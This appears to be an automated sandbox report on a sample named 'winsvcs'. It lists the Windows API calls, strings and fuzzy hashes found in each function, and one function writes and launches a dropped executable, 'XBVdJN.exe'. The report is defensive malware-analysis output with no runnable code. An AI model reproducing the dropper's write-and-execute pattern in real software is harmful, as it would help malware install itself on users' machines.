MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1A4
LineTo.GDI32(0044A654,?,00000770), ref: 0040D1B3
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1BE
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D1CA
GetDC.USER32(0044A660), ref: 0040D23D
CreateFontIndirectA.GDI32(0044B128), ref: 0040D25F
SelectObject.GDI32(0044A655,00000000), ref: 0040D269
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D275
SetTextColor.GDI32(0044A655,?), ref: 0040D283
GetDC.USER32(0044A660), ref: 0040D303
CreateFontIndirectA.GDI32(0044B168), ref: 0040D325
SelectObject.GDI32(0044A655,00000000), ref: 0040D32F
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D33B
SetTextColor.GDI32(0044A655,?), ref: 0040D349
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D3BD
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D3D6
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D3E7
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D3FA
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D405
LineTo.GDI32(0044A654,?,00000770), ref: 0040D414
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D41F
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D42B
CreateSolidBrush.GDI32(0014C8C8), ref: 0040D469
LoadCursorA.USER32(00000000,00007F02), ref: 0040D47D
LoadIconA.USER32(00000000,00007F02), ref: 0040D491
GetModuleHandleA.KERNEL32(00000000), ref: 0040D4AE
LoadIconA.USER32(00000000), ref: 0040D4BD
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D4FF
GetClientRect.USER32(00000000,?), ref: 0040D510
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D537
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D560
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D56D
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D57C
GetModuleHandleA.KERNEL32(00000000), ref: 0040D584
LoadBitmapA.USER32(00000000), ref: 0040D596
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D5AE
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D5C6
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D68B
GetClientRect.USER32(0044A660,?), ref: 0040D69C
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D6C2
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D6CD
GetDC.USER32(0044A660), ref: 0040D740
CreateFontIndirectA.GDI32(0044B1A8), ref: 0040D762
SelectObject.GDI32(0044A655,00000000), ref: 0040D76C
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D778
SetTextColor.GDI32(0044A655,?), ref: 0040D786
CreateSolidBrush.GDI32(0014C8C8), ref: 0040D80D
LoadCursorA.USER32(00000000,00007F02), ref: 0040D821
LoadIconA.USER32(00000000,00007F02), ref: 0040D835
GetModuleHandleA.KERNEL32(00000000), ref: 0040D852
LoadIconA.USER32(00000000), ref: 0040D861
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D8A3
GetClientRect.USER32(00000000,?), ref: 0040D8B4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D8DB
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D904
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D911
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D920
GetModuleHandleA.KERNEL32(00000000), ref: 0040D928
LoadBitmapA.USER32(00000000), ref: 0040D93A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D952
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D96A
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D9BD
GetClientRect.USER32(0044A660,?), ref: 0040D9CE
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D9F4
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D9FF
GetDC.USER32(0044A660), ref: 0040DA72
CreateFontIndirectA.GDI32(0044B1E8), ref: 0040DA94
SelectObject.GDI32(0044A655,00000000), ref: 0040DA9E
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040DAAA
SetTextColor.GDI32(0044A655,?), ref: 0040DAB8
CreateSolidBrush.GDI32(0014C8C8), ref: 0040DB03
LoadCursorA.USER32(00000000,00007F02), ref: 0040DB17
LoadIconA.USER32(00000000,00007F02), ref: 0040DB2B
GetModuleHandleA.KERNEL32(00000000), ref: 0040DB48
LoadIconA.USER32(00000000), ref: 0040DB57
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DB99
GetClientRect.USER32(00000000,?), ref: 0040DBAA
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DBD1
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DBFA
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DC07
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DC16
GetModuleHandleA.KERNEL32(00000000), ref: 0040DC1E
LoadBitmapA.USER32(00000000), ref: 0040DC30
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DC48
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DC60
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040DCE6
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040DCFF
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040DD10
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040DD23
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD2E
LineTo.GDI32(0044A654,?,00000770), ref: 0040DD3D
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD48
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040DD54
GetDlgItem.USER32(0044A660,0000007B), ref: 0040DD90
GetClientRect.USER32(0044A660,?), ref: 0040DDA1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040DDC7
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040DDD2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040DE1D
LoadCursorA.USER32(00000000,00007F02), ref: 0040DE31
LoadIconA.USER32(00000000,00007F02), ref: 0040DE45
GetModuleHandleA.KERNEL32(00000000), ref: 0040DE62
LoadIconA.USER32(00000000), ref: 0040DE71
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DEB3
GetClientRect.USER32(00000000,?), ref: 0040DEC4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DEEB
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DF14
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DF21
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DF30
GetModuleHandleA.KERNEL32(00000000), ref: 0040DF38
LoadBitmapA.USER32(00000000), ref: 0040DF4A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DF62
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DF7A
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E00E
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E021
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E02C
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E038
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E049
LineTo.GDI32(0044A654,?,?), ref: 0040E05E
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E06F
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E082
CreateSolidBrush.GDI32(0014C8C8), ref: 0040E0C0
LoadCursorA.USER32(00000000,00007F02), ref: 0040E0D4
LoadIconA.USER32(00000000,00007F02), ref: 0040E0E8
GetModuleHandleA.KERNEL32(00000000), ref: 0040E105
LoadIconA.USER32(00000000), ref: 0040E114
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E156
GetClientRect.USER32(00000000,?), ref: 0040E167
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E18E
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E1B7
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E1C4
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E1D3
GetModuleHandleA.KERNEL32(00000000), ref: 0040E1DB
LoadBitmapA.USER32(00000000), ref: 0040E1F4
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E20C
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E224
GetDC.USER32(0044A660), ref: 0040E297
CreateFontIndirectA.GDI32(0044B228), ref: 0040E2B9
SelectObject.GDI32(0044A655,00000000), ref: 0040E2C3
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E2CF
SetTextColor.GDI32(0044A655,?), ref: 0040E2DD
GetDlgItem.USER32(0044A660,0000007B), ref: 0040E352
GetClientRect.USER32(0044A660,?), ref: 0040E363
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E389
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E394
GetDC.USER32(0044A660), ref: 0040E41B
CreateFontIndirectA.GDI32(0044B268), ref: 0040E43D
SelectObject.GDI32(0044A655,00000000), ref: 0040E447
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E453
SetTextColor.GDI32(0044A655,?), ref: 0040E461
GetDlgItem.USER32(0044A660,0000007B), ref: 0040E4F1
GetClientRect.USER32(0044A660,?), ref: 0040E502
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E528
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E533
CreateSolidBrush.GDI32(0014C8C8), ref: 0040E5B2
LoadCursorA.USER32(00000000,00007F02), ref: 0040E5C6
LoadIconA.USER32(00000000,00007F02), ref: 0040E5DA
GetModuleHandleA.KERNEL32(00000000), ref: 0040E5F7
LoadIconA.USER32(00000000), ref: 0040E606
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E646
GetClientRect.USER32(00000000,?), ref: 0040E657
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E67E
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E6A7
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E6B4
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E6C3
GetModuleHandleA.KERNEL32(00000000), ref: 0040E6CB
LoadBitmapA.USER32(00000000,?), ref: 0040E6D3
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E6EB
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E703
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E778
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E78B
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E796
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E7A2
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7B3
LineTo.GDI32(0044A654,?,?), ref: 0040E7C8
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7D9
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E7EC
SHGetMalloc.SHELL32(?), ref: 0040E817
SHGetDesktopFolder.SHELL32(?), ref: 0040E8D4
SendMessageA.USER32(0044A660,0000001F,00000000,00000000), ref: 0040EB38
SetTimer.USER32(00000000,?,?,004225B0), ref: 0040EB65
TrackPopupMenuEx.USER32(?,0044A650,00000008,?,0044A660,?), ref: 0040EB8C
KillTimer.USER32(00000000,00000000), ref: 0040EB99
BeginPaint.USER32(0044A660,?), ref: 0040EBAE
IsRectEmpty.USER32(?), ref: 0040EBBC
GetSystemTime.KERNEL32(?), ref: 0040EBCE
SetTimer.USER32(0044A660,00000001,?,004225B0), ref: 0040EBEC
EndPaint.USER32(0044A660,?), ref: 0040EBF4
GetClientRect.USER32(0044A660,?), ref: 0040EC12
CreateCompatibleDC.GDI32(00000000), ref: 0040EC28
SelectObject.GDI32(00000000,00000000), ref: 0040EC3B
GetObjectA.GDI32(00000000,00000018,?), ref: 0040EC57
GetClientRect.USER32(0044A660,?), ref: 0040EC6E
StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00000001,00000001,00CC0020), ref: 0040ECB9
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 0040ECE2
SelectObject.GDI32(00000000,00000000), ref: 0040ECEA
DeleteDC.GDI32(00000000), ref: 0040ECF1
GetCursorInfo.USER32(?), ref: 0040ED25
GetCursorPos.USER32(?), ref: 0040ED53
WindowFromPoint.USER32(?,?), ref: 0040ED67
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040ED74
GetCurrentThreadId.KERNEL32 ref: 0040ED7C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0040ED8C
GetCursor.USER32 ref: 0040ED96
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0040EDA2
GetCursor.USER32 ref: 0040EDAC
StrRetToStrA.SHLWAPI(?,00000000,?), ref: 0040EDE5
_printf.LIBCMT ref: 0040EDFB
GetDC.USER32(00000000), ref: 0040EE12
EnumFontFamiliesA.GDI32(00000000,00000000,?,00000000), ref: 0040EE24
GetActiveWindow.USER32 ref: 0040EE2A
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040EF28
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040EF38
GetModuleHandleA.KERNEL32(00000000), ref: 0040EF40
LoadIconA.USER32(00000000,0043ABC0), ref: 0040EF4C
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040EF5B
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F048
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F058
GetModuleHandleA.KERNEL32(00000000), ref: 0040F060
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F06C
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F07B
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F120
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F130
GetModuleHandleA.KERNEL32(00000000), ref: 0040F138
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F144
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F153

Strings

<, xrefs: 0040D2D3
<, xrefs: 0040C3EF
<, xrefs: 0040C30F
<, xrefs: 0040CA99
<, xrefs: 0040CFE8
<, xrefs: 0040DA42
<, xrefs: 0040CCED
<, xrefs: 0040D710
<, xrefs: 0040E267
<, xrefs: 0040BA4C
<, xrefs: 0040BFDC
<, xrefs: 0040D20D
<, xrefs: 0040C955
<, xrefs: 0040B5EC
<, xrefs: 0040E3EB

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: Load$Create$Move$Window$Line$Rect$MessageSend$HandleIconModule$Client$BitmapImage$Object$Select$CursorFont$ColorIndirectText$BrushInvalidateItemSolid$Thread$Timer$AttachInputPaint$ActiveBeginCompatibleCurrentDeleteDesktopEmptyEnumFamiliesFolderFromInfoKillMallocMenuPointPopupProcessStretchSystemTimeTrack_printf
String ID: <$<$<$<$<$<$<$<$<$<$<$<$<$<$<
API String ID: 1152109118-461452962
Opcode ID: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
Instruction ID: a9c2557e841c6cb4aed079c13c2012efc5e0e09a695cb913e2437938431cc45a
Opcode Fuzzy Hash: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
Instruction Fuzzy Hash: 1773C070548340AFE3348F60DC89FEB77B9FF99305F045929FA4992290D7B86845CB6A

Function 00479044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00479223
WriteFile.KERNELBASE(00000000,FFFADB8B,00003E00,?,00000000), ref: 00479252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00479256
WinExec.KERNEL32(?,00000005), ref: 00479262

Strings

dleA, xrefs: 004790D0
WinE, xrefs: 00479110
Writ, xrefs: 00479148
el32, xrefs: 004790FB
Crea, xrefs: 00479169
.dll, xrefs: 00479102
XBVdJN.exe, xrefs: 004791FD, 00479200
Clos, xrefs: 00479129
lstr, xrefs: 004791A7
athA, xrefs: 00479199
GetM, xrefs: 004790B6
odul, xrefs: 0047922D
catA, xrefs: 004791AF
Kern, xrefs: 004790F4
GetT, xrefs: 00479188

Memory Dump Source

Source File: 0000000E.00000002.2873594719.0000000000479000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00479000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_479000_winsvcs.jbxd

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XBVdJN.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-4190719182
Opcode ID: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
Instruction ID: 58ba0b43668d7517482e7b7aa96e86c75ac4398e6d64cdf10e80ef0de2497ba1
Opcode Fuzzy Hash: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
Instruction Fuzzy Hash: 89611774D002169BDF24CF94C888AEEB7B5FB44315F64C2ABD409AB701C7789E91CB99

Function 0040FCC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePen.GDI32(00000000), ref: 0040FD85
CreateFontIndirectA.GDI32(00000028), ref: 0040FDF4
GetSysColor.USER32(00000005), ref: 0040FE0C

Strings

dD, xrefs: 0040FE36
Taho, xrefs: 0040FDE8

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: Create$ColorFontIndirect
String ID: Taho$dD
API String ID: 4251253423-4141250355
Opcode ID: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
Instruction ID: fcce034208925bc6aaa437948b4944f0ceb75c6593572307ad6557a4650ec99a
Opcode Fuzzy Hash: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
Instruction Fuzzy Hash: 1641C3B08053489FDB24CF1AC98478ABBE4FB49314F60866EE95C8B351C3758946CF95

Function 00429B0C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00429B21

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
Instruction ID: 1759a15e84957c5be0338275ad0a4f9db10762a5021981fbe78d74647f587313
Opcode Fuzzy Hash: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
Instruction Fuzzy Hash: 08D05E7AA903456AEB009F76BC08B263BDCE385795F048436F80CC6190E674D9409E48

Function 02313894 Relevance: 1.5, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 023138B7

Memory Dump Source

Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
Instruction ID: 5491c17522c4689755f93e42571c3a18064d56a030dfa7599083be755018c6d8
Opcode Fuzzy Hash: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
Instruction Fuzzy Hash: 66E07E7590020CAFCF01DF94D94589DBBB5EB08200F008199ED54A6311D6319A20EF51

Function 02313904 Relevance: 1.5, APIs: 1, Instructions: 15
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0231391E

Memory Dump Source

Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
Instruction ID: ff99536a54c0b4a7f08c48841b9d4bb720aff9f916d6c7cd1290506796b4e0ef
Opcode Fuzzy Hash: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
Instruction Fuzzy Hash: 89D04274D0420CAF8B14EFA8D54589CFBF5EB08200F1081AAEC04A7311EA31AA50DF91

Function 0040FC5D Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 0040FC62

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
Instruction ID: f450d144a2216a65e4146170c8b5550937e7e802fcbd3a1ddd5c57f0d0063f53
Opcode Fuzzy Hash: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
Instruction Fuzzy Hash: A6D05E786843029FE714DF20EC84FA633A8EB1A704F46053DE884D72A0D7789501CB5E

Function 02313854 Relevance: 1.3, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02313877

Memory Dump Source

Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: af8c1d895f375091eb1e72980f4e25f1ff833d804355a69e95d82f31dac8c014
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: 61E07E7590020CAFCF05DF94D94589DBBB5EB08210F00809AED14A6311D6319A20EF51

Function 02310570 Relevance: 1.3, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02310593

Memory Dump Source

Source File: 0000000E.00000002.2874373387.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2310000_winsvcs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: 7569a63427e2638927db8bc5cff9dfdeb981afaf99680e0f73411b78bc5c956c
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: BBE07E7590020CAFCF05DF98D94589DBBB5EB08310F00809AED14A6211D6319A61AF91

Function 02313824 Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02313844

Memory Dump Source

Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: 8ea9aa2aa6eab2d2d06a90fa68ba9f89661e3dcf01b074b2ba4ac002b6cda761
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: EFE00275D0420CEF8F15DF94D94599DBBB5EB18210F108199ED14A7311D6319A60DF91

Function 02310540 Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02310560

Memory Dump Source

Source File: 0000000E.00000002.2874373387.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2310000_winsvcs.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: f6012de57ab58a48443c115ce07a542be81ad39e92d8acf856a3a9d4f1ef4a75
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: 58E00275D4020CEF8B05DF98D94599DBBB5EB18310F108199ED1497311D6319A61DF91

Function 02313764 Relevance: 1.3, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 02313781

Memory Dump Source

Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction ID: 7d734a4cda3eb2310a22ea1d69d3e444a86dd6eb0613ef7dd083d897e2fb225b
Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
